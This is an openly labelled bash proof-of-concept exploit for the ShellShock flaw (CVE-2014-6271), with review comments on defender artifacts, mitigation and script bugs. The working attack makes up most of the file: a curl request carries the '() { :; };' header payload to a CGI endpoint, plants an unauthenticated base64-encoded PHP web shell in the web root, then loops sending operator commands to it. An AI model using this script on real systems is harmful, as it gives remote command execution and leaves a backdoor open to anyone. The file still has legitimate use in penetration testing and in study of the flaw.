CVE-2014-6271.sh
#!/bin/bash
# CVE-2014-6271 : ShellShock Exploit
# https://nvd.nist.gov/vuln/detail/CVE-2014-6271
#
# Purpose: proof-of-concept for CVE-2014-6271. The script sends one HTTP
# request whose User-Agent header carries a Bash function definition followed
# by trailing commands, aimed at a CGI endpoint. The trailing commands write a
# PHP file to /var/www/html/simple.php on the target. The script then loops,
# reading a line from the operator and passing it to that file through the
# `cmd` query parameter with curl.
#
# Usage: CVE-2014-6271 -i <target ip> -p <port> -u <uri>
#
# Artifacts a defender can look for (all visible in the requests below):
#   - request headers whose value begins with "() {" in web server or proxy logs
#   - a file named simple.php appearing in the web root
#   - GET requests to /simple.php carrying a `cmd=` query parameter
# Mitigation for the underlying flaw is a Bash build patched for CVE-2014-6271;
# filtering the header pattern at a proxy or WAF is only a stopgap.
#
# NOTE(review): the script never removes simple.php. The decoded payload
# (see the comment above the curl call) performs no authentication, so the file
# keeps executing the `cmd` parameter for any client that can reach it until it
# is deleted. It has to be tracked and removed as a test artifact.
#
# On Ctrl-C: restore the default INT disposition and re-send INT to this
# process, so the script terminates from the signal instead of continuing in
# one of the endless read loops at the bottom.
trap '
trap - INT # restore default INT handler
kill -s INT "$$"
' INT
# Show the help text when no argument is given or when the first argument is
# -h or --help, then exit. `exit` has no explicit status, so the status is that
# of the last echo.
if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ] ; then
# This option displays a help message and command execution examples
echo ""
echo "OsbornePro CVE-2014-6271 1.0 ( https://roberthosborne.com )"
echo ""
echo "USAGE: CVE-2014-6271 -i <target ip> -p <port> -u <uri>"
echo ""
echo "OPTIONS:"
echo " -h : Displays the help information for the command."
echo " -i : Defines the ip address of the target"
echo " -p : Defines the port the web server is running on"
echo " -u : Defines the URI that is exploitable to ShellShock"
echo ""
echo "EXAMPLES:"
echo " CVE-2014-6271 -i 10.10.10.10 -p 8080 -u '/cgi-bin/index.cgi'"
echo " # This example exploits shell shock at http://10.10.10.10.:8080/cgi-bin/index.cgi"
echo ""
exit
fi
# Parse -i/-p/-u. The leading ':' in the optstring puts getopts in silent mode,
# and the case has no '?' or ':' arm, so unknown options and options missing
# their argument are ignored without a message.
while getopts ":i:p:u:" OPT; do
case $OPT in
i) ip=$OPTARG;;
p) port=$OPTARG;;
u) uri=$OPTARG;;
esac
done
# The target is mandatory. NOTE(review): this error path uses a bare `exit`, so
# the script reports the status of the printf (success) rather than a failure.
if [ -z "$ip" ]
then
printf "[!] Please define the ip address or hostname of the target\n"
exit
fi
# Default the port to 80 when -p was not given. Only emptiness is tested; the
# value is not validated as a port number. The message has no trailing newline,
# so the next line of output is appended to it.
if [ -z "$port" ]
then
printf "[*] A valid port was not defined\nSetting default value to 80"
port=80
fi
# Default the CGI path when -u was not given.
if [ -z "$uri" ]
then
printf "[*] No uri was defined. Setting default value to /cgi-bin/index.cgi\n"
uri="/cgi-bin/index.cgi"
fi
printf "[*] Sending exploit...\n"
# Encoded in base64 <html><head><h1>tobor</h1></head><body><p><?php echo '<pre>' . shell_exec($_GET ['cmd']) . '</pre>' ;?></p></body></html>
# The User-Agent value is the ShellShock pattern: a function definition
# "() { :; };" followed by commands. Those commands base64-decode the blob and
# redirect the result to /var/www/html/simple.php on the target.
# NOTE(review): the `&&` tests only curl's exit status. curl is called without
# -f, so any completed HTTP exchange counts as success; the "Webshell has been
# created" message does not confirm that the file was written and is also
# printed against a patched host.
# NOTE(review): ${ip}, ${port} and ${uri} are expanded unquoted, so they are
# subject to word splitting and globbing in the local shell.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'echo -en \"PGh0bWw+PGhlYWQ+PGgxPnRvYm9yPC9oMT48L2hlYWQ+PGJvZHk+PHA+PD9waHAgZWNobyAnPHByZT4nIC4gc2hlbGxfZXhlYygkX0dFVCBbJ2NtZCddKSAuICc8L3ByZT4nIDs/PjwvcD48L2JvZHk+PC9odG1sPg==\"| base64 -d > /var/www/html/simple.php'" http://${ip}:${port}${uri} && printf "Webshell has been created at /var/www/html/simple.php\n"
# Interactive loop. `ssl` is not assigned by the option parsing above, so the
# HTTPS branch is taken only when the variable is already set in the calling
# environment.
if [ "$ssl" ];
then
# HTTPS variant. -k turns off TLS certificate verification, so the identity of
# the responding server is not checked. Both sed passes strip the fixed HTML
# wrapper that simple.php puts around the command output.
# NOTE(review): `read` is used without -r, and $CMD is placed in the URL
# unquoted and without URL encoding, so the line is word-split and
# glob-expanded by the local shell before curl sees it.
while :; do
printf "[php-web-shell>]"
read CMD
curl -sL -k https://$ip:$port/simple.php?cmd=$CMD 2>&1 | sed 's/\(<html><head><h1>tobor<\/h1><\/head><body><p><pre>\|<\/pre>\)//g' | sed 's/\(<\/p><\/body><\/html>\)//g'
done
else
# Plain HTTP variant of the same loop: the typed line and the returned output
# cross the network unencrypted. The same quoting caveats apply to $CMD.
while :; do
printf "[php-web-shell>]"
read CMD
curl -sL http://$ip:$port/simple.php?cmd=$CMD 2>&1 | sed 's/\(<html><head><h1>tobor<\/h1><\/head><body><p><pre>\|<\/pre>\)//g' | sed 's/\(<\/p><\/body><\/html>\)//g'
done
fi